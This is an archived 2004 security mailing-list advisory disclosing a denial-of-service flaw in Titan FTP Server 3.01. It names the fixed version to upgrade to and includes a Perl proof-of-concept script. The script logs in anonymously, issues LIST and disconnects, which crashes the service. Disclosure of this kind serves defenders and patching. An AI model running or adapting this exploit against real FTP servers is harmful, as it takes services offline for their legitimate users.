[VulnWatch] Titan FTP Server Aborted LIST DoS

From: Aviram Jenik (aviram_at_beyondsecurity.com)
Date: 05/05/04

  • Next message: SGI Security Coordinator: "[VulnWatch] IRIX libcpr vulnerability" 
    To: vulnwatch@vulnwatch.org
Date: Wed, 5 May 2004 15:51:35 +0300

     Titan FTP Server Aborted LIST DoS
    ----------------------------------------------------

    Article reference:
    http://www.securiteam.com/windowsntfocus/5RP0215CUU.html

    SUMMARY

    A security vulnerability exists in South River Technologies' Titan FTP Server.
    An attacker issuing a LIST command and disconnecting before the LIST command
    had the time to connect, will cause the program to try and access an invalid
    socket. This will result in the FTP service's crash (and in turn, no longer
    being able to service any additional users).

    DETAILS

    Vulnerable Systems:
      * Titan FTP Server version 3.01 build 163

     Immune Systems:
      * Titan FTP Server version 3.10 build 169

     Solution:
     To solve this issue upgrade to the latest version (3.10 build 169 or newer).

     Exploit:
     #!/usr/bin/perl
     # Test for Titan FTP server security vulnerability
     #
     # Orkut users? Come join the SecuriTeam community
     # http://www.orkut.com/Community.aspx?cmm=44441
     #
     use IO::Socket;

     $host = "192.168.1.243";

     my @combination;
     $combination[0] = "LIST \r\n";

     for (my $i = 0; $combination[$i] ; $i++)
     {
      print "Combination: $1\n";

      $remote = IO::Socket::INET->new ( Proto => "tcp",
          PeerAddr => $host,
          PeerPort => "2112",
          );
      unless ($remote) { die "cannot connect to ftp daemon on $host" }

      print "connected\n";
      while (<$remote>)
      {
       print $_;
       if (/220 /)
       {
        last;
       }
      }

      $remote->autoflush(1);

      my $ftp = "USER anonymous\r\n";

      print $remote $ftp;
      print $ftp;

      while (<$remote>)
      {
       print $_;
       if (/331 /)
       {
        last;
       }
      }

      $ftp = "PASS a\@b.com\r\n";
      print $remote $ftp;
      print $ftp;
      
      while (<$remote>)
      {
       print $_;
       if (/230 /)
       {
        last;
       }
      }
      
      $ftp = $combination[$i];

      print $remote $ftp;
      print $ftp;

      while (<$remote>)
      {
       print $_;
       if (/150 /)
       {
        last;
       }
      

      close $remote;
     }

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    Regards,
    Aviram Jenik
    Beyond Security Ltd.

    http://www.BeyondSecurity.com
    http://www.SecuriTeam.com

    The First Integrated Network and Web Application Vulnerability Scanner:
    http://www.beyondsecurity.com/webscan-wp.pdf

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect, incidental, consequential, loss of business profits or special
    damages.

  • Next message: SGI Security Coordinator: "[VulnWatch] IRIX libcpr vulnerability"

    Relevant Pages

    • Titan FTP Server Aborted LIST DoS
      ... A security vulnerability exists in South River Technologies' Titan FTP Server. ... An attacker issuing a LIST command and disconnecting before the LIST command ...
      (Bugtraq)
    • [Full-Disclosure] Titan FTP Server Aborted LIST DoS
      ... A security vulnerability exists in South River Technologies' Titan FTP Server. ... An attacker issuing a LIST command and disconnecting before the LIST command ...
      (Full-Disclosure)
    • SecurityFocus Microsoft Newsletter #165
      ... Tenable Security ... distribute, manage, and communicate vulnerability and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln... ...
      (Focus-Microsoft)
    • SecurityFocus Microsoft Newsletter #174
      ... This issue sponsored by: Tenable Network Security ... the worlds only 100% passive vulnerability ... MICROSOFT VULNERABILITY SUMMARY ... Novell Netware Enterprise Web Server Multiple Vulnerabilitie... ...
      (Focus-Microsoft)
    • [NT] Cumulative Security Update for Internet Explorer (MS04-038)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ...
      (Securiteam)